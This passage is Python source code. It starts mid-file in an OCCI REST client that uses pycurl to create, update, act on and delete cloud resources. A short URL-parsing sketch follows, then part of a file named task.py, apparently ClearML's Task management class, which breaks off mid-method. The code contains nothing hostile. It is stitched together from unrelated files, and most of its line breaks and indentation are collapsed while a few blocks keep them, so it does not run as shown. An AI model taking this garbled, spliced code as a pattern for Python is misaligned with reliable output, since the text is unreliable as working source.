c.setopt(c.HTTPHEADER, ['Accept:text/plain', 'Content-Type: application/occi+json']) c.setopt(pycurl.POSTFIELDS, json.dumps(resource)) c.setopt(c.CUSTOMREQUEST, 'PUT') c.perform() def action_process(self, action, uuid): actionresource = ['actions'] actionresource[0]={} actionresource[0]['term']=action actionresource[0]['scheme']='http://schemas.ogf.org/occi/infrastructure/' + self.category + 'action#' actions = {} actions['actions'] = actionresource c = pycurl.Curl() c.setopt(c.URL, 'http://' + self.host + ':' + self.port + '/' + self.category + '/' + uuid + '?action=' + action) c.setopt(c.HTTPHEADER, ['Accept:text/plain', 'Content-Type: application/occi+json']) c.setopt(c.CUSTOMREQUEST, 'POST') c.setopt(pycurl.POSTFIELDS, json.dumps(actions)) c.perform() def get_process(self, uuid): storage = StringIO.StringIO() c = pycurl.Curl() c.setopt(c.URL, 'http://' + self.host + ':' + self.port + '/' + self.category + '/' + uuid) c.setopt(c.HTTPHEADER, ['Accept:application/occi+json', 'Content-Type: application/occi+json']) c.setopt(c.CUSTOMREQUEST, 'GET') c.setopt(c.WRITEFUNCTION, storage.write) c.perform() content = storage.getvalue() resources = ast.literal_eval(content) return resources['resources'][0]['attributes']['occi'][self.category] def post_process(self, uuid): attribute = {} attribute [self.category] = self.entity occi = {} occi['occi'] = attribute categ = {} categ['id'] = uuid categ['attributes'] = occi categ['kind'] = 'http://schemas.ogf.org/occi/infrastructure#' + self.category resource = {} resource['resources']=[categ] c = pycurl.Curl() c.setopt(c.URL, 'http://' + self.host + ':' + self.port + '/' + self.category + '/') c.setopt(c.HTTPHEADER, ['Accept:text/plain', 'Content-Type: application/occi+json']) c.setopt(pycurl.POSTFIELDS, json.dumps(resource)) c.setopt(c.CUSTOMREQUEST, 'POST') c.perform() def delete_process(self, uuid): c = pycurl.Curl() c.setopt(c.URL, 'http://' + 
self.host + ':' + self.port + '/' + self.category + '/' + uuid) c.setopt(c.HTTPHEADER, ['Accept:text/plain', 'Content-Type: application/occi+json']) c.setopt(c.CUSTOMREQUEST, 'DELETE') c.perform() def GetElement_pathuuid(self, pathuuid): parametres = {} templist = pathuuid.split() pathuuid = ''.join(templist) temppath = pathuuid[7:] parametres['host']=temppath[:temppath.find(':')] temppath = temppath[temppath.find(':')+1:] if (temppath.find('/') != -1): parametres['port']=temppath[:temppath.find('/')] temppath = temppath[temppath.find('/')+1:] parametres['category']=temppath[:temppath.find('/')] parametres['uuid']=temppath[temppath.find('/')+1:] else: parametres['port']=temppath return parametres def GET(self, uuid): p1 = Process(target = self.get_process, args = (uuid,)) p1.start() def POSTall(self): p1 = Process(target = self.postall_process) p1.start() def POST(self, uuid): p1 = Process(target = self.post_process, args = (uuid,)) p1.start() def DELETE(self, uuid): p1 = Process(target = self.delete_process, args = (uuid,)) p1.start() def PUT(self): p1 = Process(target = self.update_process) p1.start() def action(self, action, uuid): p1 = Process(target = self.action_process, args = (action, uuid)) p1.start() if __name__ == '__main__': deletes = OCCIinterfaceClient('127.0.0.1', '8085', 'intercng', {}) deletes.DELETE('mmmaraa-dd9a-dd504f-8861-aeadsds')
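# Sketch of what GetElement_pathuuid computes, expressed with the standard
# library's urlparse (Python 3) instead of manual string slicing. This is an
# alternative illustration, not a drop-in replacement for the method above;
# the output keys simply mirror the original dict.
from urllib.parse import urlparse


def parse_resource_url(url):
    parts = urlparse(url)
    result = {'host': parts.hostname, 'port': str(parts.port or '')}
    path = parts.path.strip('/')
    if path:
        category, _, uuid = path.partition('/')
        result['category'] = category
        result['uuid'] = uuid
    return result


print(parse_resource_url('http://127.0.0.1:8085/intercng/mmmaraa-dd9a-dd504f-8861-aeadsds'))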
task.py
""" Backend task management support """ import itertools import json import logging import os import re import sys from copy import copy from enum import Enum from multiprocessing import RLock from operator import itemgetter from tempfile import gettempdir from threading import Thread from typing import Optional, Any, Sequence, Callable, Mapping, Union, List, Set from uuid import uuid4 from pathlib2 import Path try: # noinspection PyCompatibility from collections.abc import Iterable except ImportError: from collections import Iterable import six from collections import OrderedDict from six.moves.urllib.parse import quote from ...utilities.locks import RLock as FileRLock from ...utilities.proxy_object import verify_basic_type from ...binding.artifacts import Artifacts from ...backend_interface.task.development.worker import DevWorker from ...backend_interface.session import SendError from ...backend_api import Session from ...backend_api.services import tasks, models, events, projects from ...backend_api.session.defs import ENV_OFFLINE_MODE from ...utilities.pyhocon import ConfigTree, ConfigFactory from ...utilities.config import config_dict_to_text, text_to_config_dict from ..base import IdObjectBase, InterfaceBase from ..metrics import Metrics, Reporter from ..model import Model from ..setupuploadmixin import SetupUploadMixin from ..util import ( make_message, get_or_create_project, get_single_result, exact_match_regex, mutually_exclusive, ) from ...config import ( get_config_for_bucket, get_remote_task_id, TASK_ID_ENV_VAR, running_remotely, get_cache_dir, DOCKER_IMAGE_ENV_VAR, get_offline_dir, get_log_to_backend, ) from ...debugging import get_logger from ...storage.helper import StorageHelper, StorageError from .access import AccessMixin from .repo import ScriptInfo, pip_freeze from .hyperparams import HyperParams from ...config import config, PROC_MASTER_ID_ENV_VAR, SUPPRESS_UPDATE_MESSAGE_ENV_VAR from ...utilities.process.mp import SingletonLock class Task(IdObjectBase, AccessMixin, SetupUploadMixin): """ Task manager providing task object access and management. Includes read/write access to task-associated frames and models. 
""" _anonymous_dataview_id = '__anonymous__' _development_tag = 'development' archived_tag = 'archived' _default_configuration_section_name = 'General' _legacy_parameters_section_name = 'Args' _force_requirements = {} _store_diff = config.get('development.store_uncommitted_code_diff', False) _store_remote_diff = config.get('development.store_code_diff_from_remote', False) _report_subprocess_enabled = config.get('development.report_use_subprocess', True) _offline_filename = 'task.json' class TaskTypes(Enum): def __str__(self): return str(self.value) def __eq__(self, other): return str(self) == str(other) training = 'training' testing = 'testing' inference = "inference" data_processing = "data_processing" application = "application" monitor = "monitor" controller = "controller" optimizer = "optimizer" service = "service" qc = "qc" custom = "custom" class TaskStatusEnum(Enum): def __str__(self): return str(self.value) def __eq__(self, other): return str(self) == str(other) created = "created" queued = "queued" in_progress = "in_progress" stopped = "stopped" published = "published" publishing = "publishing" closed = "closed" failed = "failed" completed = "completed" unknown = "unknown" class DeleteError(Exception): pass def __init__(self, session=None, task_id=None, log=None, project_name=None, task_name=None, task_type=TaskTypes.training, log_to_backend=True, raise_on_validation_errors=True, force_create=False): """ Create a new task instance. :param session: Optional API Session instance. If not provided, a default session based on the system's configuration will be used. :type session: Session :param task_id: Optional task ID. If not provided, a new task will be created using the API and its information reflected in the resulting instance. :type task_id: string :param log: Optional log to be used. If not provided, and internal log shared with all backend objects will be used instead. :type log: logging.Logger :param project_name: Optional project name, used only if a new task is created. The new task will be associated with a project by this name. If no such project exists, a new project will be created using the API. :type project_name: str :param task_name: Optional task name, used only if a new task is created. :type project_name: str :param task_type: Optional task type, used only if a new task is created. Default is training task. :type task_type: str (see tasks.TaskTypeEnum) :param log_to_backend: If True, all calls to the task's log will be logged to the backend using the API. This value can be overridden using the environment variable TRAINS_LOG_TASK_TO_BACKEND. 
:type log_to_backend: bool :param force_create: If True a new task will always be created (task_id, if provided, will be ignored) :type force_create: bool """ SingletonLock.instantiate() task_id = self._resolve_task_id(task_id, log=log) if not force_create else None self.__edit_lock = None super(Task, self).__init__(id=task_id, session=session, log=log) self._project_name = None self._storage_uri = None self._input_model = None self._output_model = None self._metrics_manager = None self.__reporter = None self._curr_label_stats = {} self._raise_on_validation_errors = raise_on_validation_errors self._parameters_allowed_types = tuple(set( six.string_types + six.integer_types + (six.text_type, float, list, tuple, dict, type(None)) )) self._app_server = None self._files_server = None self._initial_iteration_offset = 0 self._reload_skip_flag = False if not task_id: # generate a new task self.id = self._auto_generate(project_name=project_name, task_name=task_name, task_type=task_type) if self._offline_mode: self.data.id = self.id self.name = task_name else: # this is an existing task, let's try to verify stuff self._validate() if self.data is None: raise ValueError("Task ID \"{}\" could not be found".format(self.id)) self._project_name = (self.project, project_name) if running_remotely() or DevWorker.report_stdout: log_to_backend = False self._log_to_backend = get_log_to_backend(default=log_to_backend) self._artifacts_manager = Artifacts(self) self._hyper_params_manager = HyperParams(self) def _validate(self, check_output_dest_credentials=True): raise_errors = self._raise_on_validation_errors output_dest = self.get_output_destination(raise_on_error=False, log_on_error=False) if output_dest and check_output_dest_credentials: try: self.log.info('Validating output destination') conf = get_config_for_bucket(base_url=output_dest) if not conf: msg = 'Failed resolving output destination (no credentials found for %s)' % output_dest self.log.warning(msg) if raise_errors: raise Exception(msg) except StorageError: raise except Exception as ex: self.log.error('Failed trying to verify output destination: %s' % ex) @classmethod def _resolve_task_id(cls, task_id, log=None): if not task_id: task_id = cls.normalize_id(get_remote_task_id()) if task_id: log = log or get_logger('task') log.info('Using task ID from env %s=%s' % (TASK_ID_ENV_VAR[0], task_id)) return task_id def _update_repository(self): def check_package_update(): # noinspection PyBroadException try: # check latest version from ...utilities.check_updates import CheckPackageUpdates latest_version = CheckPackageUpdates.check_new_package_available(only_once=True) if latest_version and not SUPPRESS_UPDATE_MESSAGE_ENV_VAR.get( default=config.get('development.suppress_update_message', False)): if not latest_version[1]: sep = os.linesep self.get_logger().report_text( '{} new package available: UPGRADE to v{} is recommended!\nRelease Notes:\n{}'.format( Session.get_clients()[0][0].upper(), latest_version[0], sep.join(latest_version[2])), ) else: self.get_logger().report_text( 'ClearML new version available: upgrade to v{} is recommended!'.format( latest_version[0]), ) except Exception: pass # get repository and create requirements.txt from code base try: check_package_update_thread = Thread(target=check_package_update) check_package_update_thread.daemon = True check_package_update_thread.start() # do not request requirements, because it might be a long process, and we first want to update the git repo result, script_requirements = ScriptInfo.get( 
filepaths=[self._calling_filename, sys.argv[0], ] if ScriptInfo.is_running_from_module() else [sys.argv[0], self._calling_filename, ], log=self.log, create_requirements=False, check_uncommitted=self._store_diff, uncommitted_from_remote=self._store_remote_diff ) for msg in result.warning_messages: self.get_logger().report_text(msg) # if the git is too large to store on the task, we must store it as artifact: if result.auxiliary_git_diff: diff_preview = "# git diff too large to handle, storing as artifact. git diff summary:\n" diff_preview += '\n'.join( line for line in result.auxiliary_git_diff.split('\n') if line.startswith('diff --git ')) self._artifacts_manager.upload_artifact( name='auxiliary_git_diff', artifact_object=result.auxiliary_git_diff, preview=diff_preview, ) # store original entry point entry_point = result.script.get('entry_point') if result.script else None # check if we are running inside a module, then we should set our entry point # to the module call including all argv's result.script = ScriptInfo.detect_running_module(result.script) # Since we might run asynchronously, don't use self.data (let someone else # overwrite it before we have a chance to call edit) with self._edit_lock: self.reload() self.data.script = result.script self._edit(script=result.script) # if jupyter is present, requirements will be created in the background, when saving a snapshot if result.script and script_requirements: entry_point_filename = None if config.get('development.force_analyze_entire_repo', False) else \ os.path.join(result.script['working_dir'], entry_point) if config.get('development.detect_with_pip_freeze', False) or \ config.get('development.detect_with_conda_freeze', False): requirements, conda_requirements = pip_freeze( config.get('development.detect_with_conda_freeze', False)) requirements = '# Python ' + sys.version.replace('\n', ' ').replace('\r', ' ') + '\n\n'\ + requirements else: requirements, conda_requirements = script_requirements.get_requirements( entry_point_filename=entry_point_filename) if requirements: if not result.script['requirements']: result.script['requirements'] = {} result.script['requirements']['pip'] = requirements result.script['requirements']['conda'] = conda_requirements self._update_requirements(result.script.get('requirements') or '') # we do not want to wait for the check version thread, # because someone might wait for us to finish the repo detection update except SystemExit: pass except Exception as e: get_logger('task').debug(str(e)) def _auto_generate(self, project_name=None, task_name=None, task_type=TaskTypes.training): created_msg = make_message('Auto-generated at %(time)s UTC by %(user)s@%(host)s') if task_type.value not in (self.TaskTypes.training, self.TaskTypes.testing) and \ not Session.check_min_api_version('2.8'): print('WARNING: Changing task type to "{}" : ' 'clearml-server does not support task type "{}", ' 'please upgrade clearml-server.'.format(self.TaskTypes.training, task_type.value)) task_type = self.TaskTypes.training project_id = None if project_name: project_id = get_or_create_project(self, project_name, created_msg) tags = [self._development_tag] if not running_remotely() else [] extra_properties = {'system_tags': tags} if Session.check_min_api_version('2.3') else {'tags': tags} req = tasks.CreateRequest( name=task_name or make_message('Anonymous task (%(user)s@%(host)s %(time)s)'), type=tasks.TaskTypeEnum(task_type.value), comment=created_msg, project=project_id, input={'view': {}}, **extra_properties ) res = 
self.send(req) return res.response.id if res else 'offline-{}'.format(str(uuid4()).replace("-", "")) def _set_storage_uri(self, value): value = value.rstrip('/') if value else None self._storage_uri = StorageHelper.conform_url(value) self.data.output.destination = self._storage_uri self._edit(output_dest=self._storage_uri or ('' if Session.check_min_api_version('2.3') else None)) if self._storage_uri or self._output_model: self.output_model.upload_storage_uri = self._storage_uri @property def storage_uri(self): # type: () -> Optional[str] if self._storage_uri: return self._storage_uri if running_remotely(): return self.data.output.destination else: return None @storage_uri.setter def storage_uri(self, value): # type: (str) -> () self._set_storage_uri(value) @property def task_id(self): # type: () -> str return self.id @property def name(self): # type: () -> str return self.data.name or '' @name.setter def name(self, value): # type: (str) -> () self.set_name(value) @property def task_type(self): # type: () -> str return self.data.type @property def project(self): # type: () -> str return self.data.project @property def parent(self): # type: () -> str return self.data.parent @property def input_model_id(self): # type: () -> str return self.data.execution.model @property def output_model_id(self): # type: () -> str return self.data.output.model @property def comment(self): # type: () -> str return self.data.comment or '' @comment.setter def comment(self, value): # type: (str) -> () self.set_comment(value) @property def cache_dir(self): # type: () -> Path """ The cache directory which is used to store the Task related files. """ return Path(get_cache_dir()) / self.id @property def status(self): # type: () -> str """ The Task's status. To keep the Task updated. ClearML reloads the Task status information only, when this value is accessed. return str: TaskStatusEnum status """ return self.get_status() @property def _status(self): # type: () -> str """ Return the task's cached status (don't reload if we don't have to) """ return str(self.data.status) @property def input_model(self): # type: () -> Optional[Model] """ A model manager used to handle the input model object """ model_id = self._get_task_property('execution.model', raise_on_error=False) if not model_id: return None if self._input_model is None: self._input_model = Model( session=self.session, model_id=model_id, cache_dir=self.cache_dir, log=self.log, upload_storage_uri=None) return self._input_model @property def output_model(self): # type: () -> Optional[Model] """ A model manager used to manage the output model object """ if self._output_model is None: self._output_model = self._get_output_model(upload_required=True) return self._output_model def create_output_model(self): # type: () -> Model return self._get_output_model(upload_required=False, force=True) def reload(self): # type: () -> () """ Reload current Task's state from clearml-server. Refresh all task's fields, including artifacts / models / parameters etc. 
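
        For example (illustrative usage, assuming ``task`` is an existing Task instance):

        .. code-block:: py

            task.reload()              # pull the latest state from the server
            print(task.data.status)    # the cached fields now reflect the backend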
""" return super(Task, self).reload() def _get_output_model(self, upload_required=True, force=False, model_id=None): # type: (bool, bool, Optional[str]) -> Model return Model( session=self.session, model_id=model_id or (None if force else self._get_task_property( 'output.model', raise_on_error=False, log_on_error=False)), cache_dir=self.cache_dir, upload_storage_uri=self.storage_uri or self.get_output_destination( raise_on_error=upload_required, log_on_error=upload_required), upload_storage_suffix=self._get_output_destination_suffix('models'), log=self.log) @property def metrics_manager(self): # type: () -> Metrics """ A metrics manager used to manage the metrics related to this task """ return self._get_metrics_manager(self.get_output_destination()) @property def _reporter(self): # type: () -> Reporter """ Returns a simple metrics reporter instance. """ if self.__reporter is None: self._setup_reporter() return self.__reporter def _get_metrics_manager(self, storage_uri): # type: (str) -> Metrics if self._metrics_manager is None: self._metrics_manager = Metrics( session=self.session, task=self, storage_uri=storage_uri, storage_uri_suffix=self._get_output_destination_suffix('metrics'), iteration_offset=self.get_initial_iteration() ) return self._metrics_manager def _setup_reporter(self): # type: () -> Reporter try: storage_uri = self.get_output_destination(log_on_error=False) except ValueError: storage_uri = None self.__reporter = Reporter( metrics=self._get_metrics_manager(storage_uri=storage_uri), task=self) return self.__reporter def _get_output_destination_suffix(self, extra_path=None): # type: (Optional[str]) -> str return '/'.join(quote(x, safe="'[]{}()$^,.; -_+-=") for x in (self.get_project_name(), '%s.%s' % (self.name, self.data.id), extra_path) if x) def _reload(self): # type: () -> Any """ Reload the task object from the backend """ with self._edit_lock: if self._offline_mode: # noinspection PyBroadException try: with open((self.get_offline_mode_folder() / self._offline_filename).as_posix(), 'rt') as f: stored_dict = json.load(f) stored_data = tasks.Task(**stored_dict) # add missing entries for k, v in stored_dict.items(): if not hasattr(stored_data, k): setattr(stored_data, k, v) if stored_dict.get('project_name'): self._project_name = (None, stored_dict.get('project_name')) except Exception: stored_data = self._data return stored_data or tasks.Task( execution=tasks.Execution( parameters={}, artifacts=[], dataviews=[], model='', model_desc={}, model_labels={}, docker_cmd=''), output=tasks.Output()) if self._reload_skip_flag and self._data: return self._data res = self.send(tasks.GetByIdRequest(task=self.id)) return res.response.task def reset(self, set_started_on_success=True): # type: (bool) -> () """ Reset the task. Task will be reloaded following a successful reset. """ self.send(tasks.ResetRequest(task=self.id)) if set_started_on_success: self.started() elif self._data: # if not started, make sure the current cached state is synced self._data.status = self.TaskStatusEnum.created self.reload() def started(self, ignore_errors=True, force=False): # type: (bool, bool) -> () """ The signal that this Task started. """ return self.send(tasks.StartedRequest(self.id, force=force), ignore_errors=ignore_errors) def stopped(self, ignore_errors=True, force=False): # type: (bool, bool) -> () """ The signal that this Task stopped. 
""" return self.send(tasks.StoppedRequest(self.id, force=force), ignore_errors=ignore_errors) def completed(self, ignore_errors=True): # type: (bool) -> () """ The signal indicating that this Task completed. """ if hasattr(tasks, 'CompletedRequest') and callable(tasks.CompletedRequest): return self.send(tasks.CompletedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors) return self.send(tasks.StoppedRequest(self.id, status_reason='completed'), ignore_errors=ignore_errors) def mark_failed(self, ignore_errors=True, status_reason=None, status_message=None): # type: (bool, Optional[str], Optional[str]) -> () """ The signal that this Task stopped. """ return self.send(tasks.FailedRequest(self.id, status_reason=status_reason, status_message=status_message), ignore_errors=ignore_errors) def publish(self, ignore_errors=True): # type: (bool) -> () """ The signal that this Task will be published """ if str(self.status) != str(tasks.TaskStatusEnum.stopped): raise ValueError("Can't publish, Task is not stopped") resp = self.send(tasks.PublishRequest(self.id), ignore_errors=ignore_errors) assert isinstance(resp.response, tasks.PublishResponse) return resp def _delete( self, delete_artifacts_and_models=True, skip_models_used_by_other_tasks=True, raise_on_error=False, ): # type: (bool, bool, bool) -> bool """ Delete the task as well as it's output models and artifacts. Models and artifacts are deleted from their storage locations, each using its URI. Note: in order to delete models and artifacts using their URI, make sure the proper storage credentials are configured in your configuration file (e.g. if an artifact is stored in S3, make sure sdk.aws.s3.credentials are properly configured and that you have delete permission in the related buckets). :param delete_artifacts_and_models: If True, artifacts and models would also be deleted (default True) :param skip_models_used_by_other_tasks: If True, models used by other tasks would not be deleted (default True) :param raise_on_error: If True an exception will be raised when encountering an error. If False an error would be printed and no exception will be raised. :return: True if the task was deleted successfully. 
""" try: res = self.send(tasks.GetByIdRequest(self.task_id)) task = res.response.task if task.status == Task.TaskStatusEnum.published: if raise_on_error: raise self.DeleteError("Cannot delete published task {}".format(self.task_id)) self.log.error("Cannot delete published task {}".format(self.task_id)) return False execution = {} models_res = [] if delete_artifacts_and_models: execution = task.execution.to_dict() if task.execution else {} models_res = self.send( models.GetAllRequest( task=[task.id], only_fields=["id", "uri"] ) ).response.models event_uris = list(self._get_all_events( event_type="training_debug_image", unique_selector=itemgetter("url"), batch_size=10000 )) event_uris.extend(self._get_image_plot_uris()) task_deleted = self.send(tasks.DeleteRequest(self.task_id, force=True)) if not task_deleted: if raise_on_error: raise self.DeleteError("Failed deleting task {}".format(self.task_id)) self.log.error("Failed deleting task {}".format(self.task_id)) return False except self.DeleteError: raise except Exception as ex: if raise_on_error: raise self.DeleteError("Task deletion failed: {}".format(ex)) self.log.error("Task deletion failed: {}".format(ex)) return False failures = [] if delete_artifacts_and_models: for e in execution["artifacts"]: if e["mode"] == "output" and not self._delete_uri(e["uri"]): failures.append(e["uri"]) for m in models_res: # noinspection PyBroadException try: is_output_model = task.output and (m.id == task.output.model) res = self.send( models.DeleteRequest(m.id, force=(not skip_models_used_by_other_tasks)), ignore_errors=is_output_model ) # Should delete if model was deleted or if this was the output model (which was already deleted # by DeleteRequest, and it's URI is dangling should_delete = is_output_model or res.response.deleted except SendError as ex: if (ex.result.meta.result_code, ex.result.meta.result_subcode) == (400, 201): # Model not found, already deleted by DeleteRequest should_delete = True else: failures.append("model id: {}".format(m.id)) continue except Exception: failures.append("model id: {}".format(m.id)) continue if should_delete and not self._delete_uri(m.uri): failures.append(m.uri) event_uris = list(filter(None, event_uris)) for uri in event_uris: if not self._delete_uri(uri): failures.append(uri) failures = list(filter(None, failures)) if len(failures): error = "Failed deleting the following URIs:\n{}".format( "\n".join(failures) ) if raise_on_error: raise self.DeleteError(error) self.log.error(error) return task_deleted def _delete_uri(self, uri): # type: (str) -> bool # noinspection PyBroadException try: deleted = StorageHelper.get(uri).delete(uri) if deleted: self.log.debug("Deleted file: {}".format(uri)) return True except Exception as ex: self.log.error("Failed deleting {}: {}".format(uri, str(ex))) return False return False def _get_image_plot_uris(self): # type: () -> Set[str] def image_source_selector(d): plot = d.get("plot_str") if plot: # noinspection PyBroadException try: plot = json.loads(plot) return next( filter(None, (image.get("source") for image in plot.get("layout", {}).get("images", []))), None ) except Exception: pass return self._get_all_events( event_type="plot", unique_selector=image_source_selector, batch_size=10000 ) def update_model_desc(self, new_model_desc_file=None): # type: (Optional[str]) -> () """ Change the Task's model description. 
""" with self._edit_lock: self.reload() execution = self._get_task_property('execution') p = Path(new_model_desc_file) if not p.is_file(): raise IOError('mode_desc file %s cannot be found' % new_model_desc_file) new_model_desc = p.read_text() model_desc_key = list(execution.model_desc.keys())[0] if execution.model_desc else 'design' execution.model_desc[model_desc_key] = new_model_desc res = self._edit(execution=execution) return res.response def update_output_model(self, model_uri, name=None, comment=None, tags=None): # type: (str, Optional[str], Optional[str], Optional[Sequence[str]]) -> () """ Update the Task's output model. Use this method to update the output model when you have a local model URI, for example, storing the weights file locally, and specifying a ``file://path/to/file`` URI) .. important:: This method only updates the model's metadata using the API. It does not upload any data. :param model_uri: The URI of the updated model weights file. :type model_uri: str :param name: The updated model name. (Optional) :type name: str :param comment: The updated model description. (Optional) :type comment: str :param tags: The updated model tags. (Optional) :type tags: [str] """ self._conditionally_start_task() self._get_output_model(upload_required=False).update_for_task( uri=model_uri, task_id=self.id, name=name, comment=comment, tags=tags) def update_output_model_and_upload( self, model_file, # type: str name=None, # type: Optional[str] comment=None, # type: Optional[str] tags=None, # type: Optional[Sequence[str]] async_enable=False, # type: bool cb=None, # type: Optional[Callable[[Optional[bool]], bool]] iteration=None, # type: Optional[int] ): # type: (...) -> str """ Update the Task's output model weights file. First, ClearML uploads the file to the preconfigured output destination (see the Task's ``output.destination`` property or call the ``setup_upload`` method), then ClearML updates the model object associated with the Task an API call. The API call uses with the URI of the uploaded file, and other values provided by additional arguments. :param str model_file: The path to the updated model weights file. :param str name: The updated model name. (Optional) :param str comment: The updated model description. (Optional) :param list tags: The updated model tags. (Optional) :param bool async_enable: Request asynchronous upload - ``True`` - The API call returns immediately, while the upload and update are scheduled in another thread. - ``False`` - The API call blocks until the upload completes, and the API call updating the model returns. (default) :param callable cb: Asynchronous callback. A callback. If ``async_enable`` is set to ``True``, this is a callback that is invoked once the asynchronous upload and update complete. :param int iteration: iteration number for the current stored model (Optional) :return: The URI of the uploaded weights file. If ``async_enable`` is set to ``True``, this is the expected URI, as the upload is probably still in progress. 
""" self._conditionally_start_task() uri = self.output_model.update_for_task_and_upload( model_file, self.id, name=name, comment=comment, tags=tags, async_enable=async_enable, cb=cb, iteration=iteration ) return uri def _conditionally_start_task(self): # type: () -> () if str(self.status) == str(tasks.TaskStatusEnum.created): self.started() @property def labels_stats(self): # type: () -> dict """ Get accumulated label stats for the current/last frames iteration """ return self._curr_label_stats def _accumulate_label_stats(self, roi_stats, reset=False): # type: (dict, bool) -> () if reset: self._curr_label_stats = {} for label in roi_stats: if label in self._curr_label_stats: self._curr_label_stats[label] += roi_stats[label] else: self._curr_label_stats[label] = roi_stats[label] def set_input_model(self, model_id=None, model_name=None, update_task_design=True, update_task_labels=True): # type: (str, Optional[str], bool, bool) -> () """ Set a new input model for the Task. The model must be "ready" (status is ``Published``) to be used as the Task's input model. :param model_id: The Id of the model on the **ClearML Server** (backend). If ``model_name`` is not specified, then ``model_id`` must be specified. :param model_name: The model name. The name is used to locate an existing model in the **ClearML Server** (backend). If ``model_id`` is not specified, then ``model_name`` must be specified. :param update_task_design: Update the Task's design - ``True`` - ClearML copies the Task's model design from the input model. - ``False`` - ClearML does not copy the Task's model design from the input model. :param update_task_labels: Update the Task's label enumeration - ``True`` - ClearML copies the Task's label enumeration from the input model. - ``False`` - ClearML does not copy the Task's label enumeration from the input model. """ if model_id is None and not model_name: raise ValueError('Expected one of [model_id, model_name]') if model_name: # Try getting the model by name. Limit to 10 results. res = self.send( models.GetAllRequest( name=exact_match_regex(model_name), ready=True, page=0, page_size=10, order_by=['-created'], only_fields=['id', 'created'] ) ) model = get_single_result(entity='model', query=model_name, results=res.response.models, log=self.log) model_id = model.id if model_id: res = self.send(models.GetByIdRequest(model=model_id)) model = res.response.model if not model.ready: # raise ValueError('Model %s is not published (not ready)' % model_id) self.log.debug('Model %s [%s] is not published yet (not ready)' % (model_id, model.uri)) else: # clear the input model model = None model_id = '' with self._edit_lock: self.reload() # store model id self.data.execution.model = model_id # Auto populate input field from model, if they are empty if update_task_design and not self.data.execution.model_desc: self.data.execution.model_desc = model.design if model else '' if update_task_labels and not self.data.execution.model_labels: self.data.execution.model_labels = model.labels if model else {} self._edit(execution=self.data.execution) def get_parameters(self, backwards_compatibility=True): # type: (bool) -> (Optional[dict]) """ Get the parameters for a Task. This method returns a complete group of key-value parameter pairs, but does not support parameter descriptions (the result is a dictionary of key-value pairs). Notice the returned parameter dict is flat: i.e. 
{'Args/param': 'value'} is the argument "param" from section "Args" :param backwards_compatibility: If True (default) parameters without section name (API version < 2.9, clearml-server < 0.16) will be at dict root level. If False, parameters without section name, will be nested under "Args/" key. :return: dict of the task parameters, all flattened to key/value. Different sections with key prefix "section/" """ if not Session.check_min_api_version('2.9'): return self._get_task_property('execution.parameters') # API will makes sure we get old parameters with type legacy on top level (instead of nested in Args) parameters = dict() hyperparams = self._get_task_property('hyperparams') or {} if not backwards_compatibility: for section in hyperparams: for key, section_param in hyperparams[section].items(): parameters['{}/{}'.format(section, key)] = section_param.value else: for section in hyperparams: for key, section_param in hyperparams[section].items(): if section_param.type == 'legacy' and section in (self._legacy_parameters_section_name, ): parameters['{}'.format(key)] = section_param.value else: parameters['{}/{}'.format(section, key)] = section_param.value return parameters def set_parameters(self, *args, **kwargs): # type: (*dict, **Any) -> () """ Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not support parameter descriptions (the input is a dictionary of key-value pairs). Notice the parameter dict is flat: i.e. {'Args/param': 'value'} will set the argument "param" in section "Args" to "value" :param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are merged into a single key-value pair dictionary. :param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``. """ return self._set_parameters(*args, __update=False, **kwargs) def _set_parameters(self, *args, **kwargs): # type: (*dict, **Any) -> () """ Set the parameters for a Task. This method sets a complete group of key-value parameter pairs, but does not support parameter descriptions (the input is a dictionary of key-value pairs). :param args: Positional arguments, which are one or more dictionary or (key, value) iterable. They are merged into a single key-value pair dictionary. :param kwargs: Key-value pairs, merged into the parameters dictionary created from ``args``. 
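
        For example (illustrative; section and parameter names are arbitrary):

        .. code-block:: py

            task._set_parameters({'Args/batch_size': 32, 'Args/epochs': 10}, __update=True)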
""" def stringify(value): # return empty string if value is None if value is None: return "" str_value = str(value) if isinstance(value, (tuple, list, dict)) and 'None' in re.split(r'[ ,\[\]{}()]', str_value): # If we have None in the string we have to use json to replace it with null, # otherwise we end up with None as string when running remotely try: str_json = json.dumps(value) # verify we actually have a null in the string, otherwise prefer the str cast # This is because we prefer to have \' as in str and not \" used in json if 'null' in re.split(r'[ ,\[\]{}()]', str_json): return str_json except TypeError: # if we somehow failed to json serialize, revert to previous std casting pass return str_value if not all(isinstance(x, (dict, Iterable)) for x in args): raise ValueError('only dict or iterable are supported as positional arguments') prefix = kwargs.pop('__parameters_prefix', None) descriptions = kwargs.pop('__parameters_descriptions', None) or dict() params_types = kwargs.pop('__parameters_types', None) or dict() update = kwargs.pop('__update', False) # new parameters dict new_parameters = dict(itertools.chain.from_iterable(x.items() if isinstance(x, dict) else x for x in args)) new_parameters.update(kwargs) if prefix: prefix = prefix.strip('/') new_parameters = dict(('{}/{}'.format(prefix, k), v) for k, v in new_parameters.items()) # verify parameters type: not_allowed = { k: type(v).__name__ for k, v in new_parameters.items() if not verify_basic_type(v, self._parameters_allowed_types) } if not_allowed: self.log.warning( "Skipping parameter: {}, only builtin types are supported ({})".format( ', '.join('%s[%s]' % p for p in not_allowed.items()), ', '.join(t.__name__ for t in self._parameters_allowed_types)) ) new_parameters = {k: v for k, v in new_parameters.items() if k not in not_allowed} use_hyperparams = Session.check_min_api_version('2.9') with self._edit_lock: self.reload() # if we have a specific prefix and we use hyperparameters, and we use set. # overwrite only the prefix, leave the rest as is. 
